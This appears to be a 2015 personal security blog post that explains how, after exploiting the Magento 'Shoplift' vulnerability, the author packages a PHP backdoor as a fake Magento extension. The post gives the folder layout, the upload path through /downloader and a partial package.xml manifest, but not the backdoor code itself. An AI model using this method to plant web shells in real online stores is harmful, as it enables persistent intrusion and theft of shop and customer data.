Artificial truth

archives | latest | homepage | atom/rss/twitter

The more you see, the less you believe.

Writing a simple extension/backdoor for Magento
Sun 15 November 2015 — download

shoplift logo

I was exploiting the shoplift vulnerability on a Magento instance, and I was looking for a practical (as in easy and clean) way to get a shell. Of course, I could have chained CVE-2015-1398 and CVE-2015-1399 like Checkpoint did, but I was way too lazy.

Instead, I decided to write an extension module and to install it. Since the internet is full of either outdated or way, way, way, way too complex tutorials about how to write a simple fucking extension with a single stupid php file, here is a quick how-to:

I didn't want to read the url-rewriting code of magento, so I decided that my backdoor will be under the errors folder.

Write (or get) a php backdoor, and put it into an errors folder, create a package.xml file like this one, and put everything into a tar.gz file, like this:

$ tree 
├── errors
│   └── backdoor.php
└── package.xml

That's it, you have your module, you can now upload it on http://yourmagentoinstan.ce/downloader, and access your backdoor on http://yourmagentoinstan.ce/errors/backdoor.php.

<?xml version="1.0"?>
<summary>Backdoor for magento</summary>
<description>Backdoor for magento</description>
    <target name="mage">
            <dir name="errors">
                <file name="backdoor.php" hash="1296555a85143621a52b2573a5cae715"/>

The hash tag is the md5sum of your file (here, backdoor.php).